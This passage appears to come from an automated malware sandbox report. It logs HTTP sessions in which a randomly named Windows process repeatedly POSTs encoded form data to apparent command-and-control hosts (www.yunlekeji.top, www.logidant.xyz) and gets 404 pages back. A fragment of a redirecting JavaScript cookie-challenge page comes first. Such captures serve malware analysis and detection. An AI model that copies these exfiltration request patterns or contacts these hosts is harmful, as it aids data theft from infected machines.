d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("3068b69ecd604df9250f19fc976177ff");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&Kdr=RN-HMNoXj6pXm&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49990	165.154.96.210	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:50.752645016 CET	635	OUT	POST /t322/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 207 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.yunlekeji.top Origin: http://www.yunlekeji.top Referer: http://www.yunlekeji.top/t322/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 65 48 2f 6d 2b 57 65 79 50 64 6f 37 58 5a 6f 50 43 7a 71 43 6d 78 53 30 5a 79 76 6d 67 45 70 33 46 4b 77 6b 6a 53 4b 6e 6d 74 43 34 4f 56 2b 6c 42 79 49 35 51 53 48 31 6f 7a 49 58 2b 2f 32 61 35 6b 58 61 64 54 58 36 57 66 46 67 76 50 33 78 62 76 62 72 6c 2f 4b 65 46 34 57 6d 45 78 67 2b 43 56 43 44 48 6a 61 6e 49 59 4c 46 38 61 33 31 78 75 6c 62 52 5a 71 53 70 45 45 49 2f 6d 66 43 2f 4d 75 67 55 72 57 55 66 37 49 53 52 36 74 4d 63 36 56 62 37 30 4e 39 65 74 36 37 4a 59 56 59 54 4c 69 46 42 6b 36 49 51 57 4e 79 34 46 70 6a 67 46 65 7a 78 59 6f 64 4e 61 6f 3d Data Ascii: KBEhCJ=IA33BtMMTtUPeH/m+WeyPdo7XZoPCzqCmxS0ZyvmgEp3FKwkjSKnmtC4OV+lByI5QSH1ozIX+/2a5kXadTX6WfFgvP3xbvbrl/KeF4WmExg+CVCDHjanIYLF8a31xulbRZqSpEEI/mfC/MugUrWUf7ISR6tMc6Vb70N9et67JYVYTLiFBk6IQWNy4FpjgFezxYodNao=
Jan 11, 2025 01:40:51.699592113 CET	1236	IN	HTTP/1.1 404 Not Found Server: F-WEB Date: Sat, 11 Jan 2025 00:40:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 910 Connection: close FAI-W-FLOW: 2024788038 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 FAI-W-AGENT_AID: 32663896 Update-Time: 1736399500 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Frame-Options: SAMEORIGIN Set-Cookie: _cliid=Yt-M2Dezds0snXOL; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 00:40:51 GMT; HttpOnly Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 00:40:51 GMT; HttpOnly Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Jan 11, 2025 01:40:51.699661016 CET	426	IN	Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 Data Ascii: <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49991	165.154.96.210	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:53.310786963 CET	655	OUT	POST /t322/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 227 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.yunlekeji.top Origin: http://www.yunlekeji.top Referer: http://www.yunlekeji.top/t322/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 78 33 46 71 67 6b 69 54 4b 6e 68 74 43 34 64 56 2f 76 50 53 49 75 51 53 44 58 6f 32 49 58 2b 2b 57 61 35 6c 48 61 64 67 50 35 58 50 46 69 6e 76 33 33 56 50 62 72 6c 2f 4b 65 46 34 71 63 45 78 6f 2b 43 67 53 44 48 47 6d 67 4a 59 4c 45 37 61 33 31 37 4f 6b 53 52 5a 71 73 70 42 63 75 2f 6c 6e 43 2f 50 36 67 56 2b 69 58 55 37 4a 62 4a 61 73 6a 4e 37 34 2f 37 47 64 33 42 50 76 74 51 35 31 37 66 64 54 76 62 47 79 67 44 32 68 4b 6f 57 68 55 78 31 2f 61 72 37 34 74 54 4e 2b 30 2b 4c 74 42 59 36 36 57 42 44 33 67 76 4a 6a 50 47 56 43 52 Data Ascii: KBEhCJ=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgSx3FqgkiTKnhtC4dV/vPSIuQSDXo2IX++Wa5lHadgP5XPFinv33VPbrl/KeF4qcExo+CgSDHGmgJYLE7a317OkSRZqspBcu/lnC/P6gV+iXU7JbJasjN74/7Gd3BPvtQ517fdTvbGygD2hKoWhUx1/ar74tTN+0+LtBY66WBD3gvJjPGVCR
Jan 11, 2025 01:40:54.241890907 CET	1236	IN	HTTP/1.1 404 Not Found Server: F-WEB Date: Sat, 11 Jan 2025 00:40:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 910 Connection: close FAI-W-FLOW: 2024857038 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 FAI-W-AGENT_AID: 32663896 Update-Time: 1736399500 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Frame-Options: SAMEORIGIN Set-Cookie: _cliid=-UBW-xCVP4Rlj2GZ; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 00:40:54 GMT; HttpOnly Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 00:40:54 GMT; HttpOnly Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Jan 11, 2025 01:40:54.241940022 CET	426	IN	Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 Data Ascii: <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49992	165.154.96.210	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:55.854413986 CET	1672	OUT	POST /t322/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1243 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.yunlekeji.top Origin: http://www.yunlekeji.top Referer: http://www.yunlekeji.top/t322/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 35 33 46 5a 59 6b 6a 77 79 6e 67 74 43 34 47 31 2f 73 50 53 49 76 51 55 72 54 6f 32 4d 74 2b 37 53 61 2f 31 62 61 62 52 50 35 65 50 46 69 34 66 33 79 62 76 61 2f 6c 37 75 61 46 2b 4b 63 45 78 6f 2b 43 6e 71 44 41 54 61 67 45 34 4c 46 38 61 33 70 78 75 6b 36 52 5a 69 38 70 42 70 54 2f 56 48 43 2b 76 71 67 58 49 2b 58 57 62 4a 5a 63 61 73 37 4e 37 30 67 37 47 42 64 42 4f 62 55 51 2b 42 37 61 73 2b 75 42 44 53 67 57 47 5a 4b 6b 30 46 76 6a 79 57 34 6a 64 34 6e 57 4e 69 48 30 4c 4a 55 4e 2f 2b 52 4e 7a 71 6c 34 76 7a 62 41 77 44 63 57 53 7a 5a 30 6e 49 78 45 34 6c 63 52 34 4f 49 48 59 64 56 58 79 63 63 54 36 37 61 51 4b 72 41 6e 51 79 50 49 6a 30 31 6a 36 76 4b 74 44 70 64 4c 73 48 51 41 56 49 70 37 6d 33 31 4f 75 31 32 7a 30 65 48 6f 79 53 38 35 30 59 63 7a 35 4f 38 46 57 51 31 70 36 4a 46 4a 56 2b 7a 6a 30 4e 52 6e 58 35 36 58 4a 6d 32 46 79 52 62 70 41 66 [TRUNCATED] Data Ascii: KBEhCJ=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgS53FZYkjwyngtC4G1/sPSIvQUrTo2Mt+7Sa/1babRP5ePFi4f3ybva/l7uaF+KcExo+CnqDATagE4LF8a3pxuk6RZi8pBpT/VHC+vqgXI+XWbJZcas7N70g7GBdBObUQ+B7as+uBDSgWGZKk0FvjyW4jd4nWNiH0LJUN/+RNzql4vzbAwDcWSzZ0nIxE4lcR4OIHYdVXyccT67aQKrAnQyPIj01j6vKtDpdLsHQAVIp7m31Ou12z0eHoyS850Ycz5O8FWQ1p6JFJV+zj0NRnX56XJm2FyRbpAfZKgeIv0mVh/bJB2NuDRd+jOCyqL6wuMTYlGiBxN2Cy1HNp4suC8BmnTCvws1xggy+f/xTDGuqm4f5QXMGCOOnVC8Ims3+C0NxPXmuTUYfwQhTubJiBCIf7ZaDkW/yINlD28OuzwxAvsVQKBVdlHAE5TPJbbqrEkMN3rTk7dstjJdc3FVIc9Rc2OHk/rI5yjZJiby29ChRWpkOVb3g86PipRybRweEetmoTyXLl7Utk6HeY8ayJOUXQzLmoLgkAODW6RMVqFyttVx3S7a4PS46eKisrQKB1Wqgd0f/9UeUmxWlbcuhRFASN056u+gUVVF/eGEJfrBgqCxobHl0Ng9Du9zyNRjsNEixb23zXNL675ZTgPorBvG+1BiYl/AZc2RiKmQFV46jc+kp0U1Xtb/SMPCdmzS8LlgubfJbtG4bE9mlsuRRlQBAhJoIf3qZcxaSAnkMMKGZuHVblJ6ikp8d3PxbuzT6K1YQ54ScmrtIcCMwzznAc+sniNevGEr6h5q0zYWpzicfWWnZtHM8uholePAxQHc6gUeoNqQ6CztzcAjpZanoOsLsFYV5uwmk6mG1mFZ8DD/UHgaHpCjQPM62nDDAB03X3vFbG9CaLP/D2+6IYO/I0U/IKJANFPvp60Ob0OK+2Dp4MTz+yG5AiPbPlCtfFyKbxvEI6 [TRUNCATED]
Jan 11, 2025 01:40:56.783948898 CET	1236	IN	HTTP/1.1 404 Not Found Server: F-WEB Date: Sat, 11 Jan 2025 00:40:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 910 Connection: close FAI-W-FLOW: 2024950038 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 FAI-W-AGENT_AID: 32663896 Update-Time: 1736399500 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Frame-Options: SAMEORIGIN Set-Cookie: _cliid=7VBI_xSSfsUkn3GJ; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 00:40:56 GMT; HttpOnly Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 00:40:56 GMT; HttpOnly Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Jan 11, 2025 01:40:56.783994913 CET	426	IN	Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 Data Ascii: <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49993	165.154.96.210	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:58.396231890 CET	378	OUT	GET /t322/?Kdr=RN-HMNoXj6pXm&KBEhCJ=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg== HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.yunlekeji.top User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 01:40:59.308166981 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Connection: close Date: Sat, 11 Jan 2025 00:40:56 GMT Content-Length: 910 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Download-Options: noopen X-XSS-Protection: 1; mode=block Cache-Flow: 2583346554 Origin-Agent-Cluster: ?0 FAI-W-FLOW: 2025038038 FAI-W-AGENT-AID: 32663896 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 P3P: CP=CAO PSA OUR X-Permitted-Cross-Domain-Policies: none Server: F-WEB Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="back" style="margi
Jan 11, 2025 01:40:59.308187962 CET	166	IN	Data Raw: 6e 2d 6c 65 66 74 3a 20 30 70 78 3b 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 61 63 6b 54 78 74 22 3e e8 bf 94 e5 9b 9e e9 Data Ascii: n-left: 0px;"><div class="backImg"></div><span class="backTxt"></span></div></a></div></div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49994	45.141.156.114	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:04.371803045 CET	632	OUT	POST /iuvu/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 207 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/iuvu/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 37 79 78 4d 4b 56 72 49 48 54 44 44 32 46 41 51 57 75 57 47 2f 63 4c 7a 78 58 6d 50 68 74 56 46 6e 67 58 31 51 54 68 4e 35 45 49 53 63 66 75 4a 45 2b 30 52 67 66 74 61 6a 43 39 68 39 4a 75 30 74 6c 34 76 73 47 4a 52 56 62 39 2f 56 53 53 2b 34 48 41 6e 35 77 6a 62 36 74 76 42 4a 6a 59 2b 75 77 4d 54 77 68 58 73 77 35 34 47 2b 47 7a 37 45 79 7a 32 69 75 4a 62 31 6a 70 42 42 64 6c 57 50 4a 65 74 71 53 36 53 73 34 68 74 5a 55 6f 39 66 69 69 33 67 4f 72 55 41 43 38 4b 44 49 77 55 55 67 6f 7a 32 74 44 39 57 2f 32 69 69 4a 77 37 77 62 39 6b 4c 47 42 56 48 45 3d Data Ascii: KBEhCJ=1E6C75TZpJNES7yxMKVrIHTDD2FAQWuWG/cLzxXmPhtVFngX1QThN5EIScfuJE+0RgftajC9h9Ju0tl4vsGJRVb9/VSS+4HAn5wjb6tvBJjY+uwMTwhXsw54G+Gz7Eyz2iuJb1jpBBdlWPJetqS6Ss4htZUo9fii3gOrUAC8KDIwUUgoz2tD9W/2iiJw7wb9kLGBVHE=
Jan 11, 2025 01:41:05.054543018 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 00:41:04 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49995	45.141.156.114	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
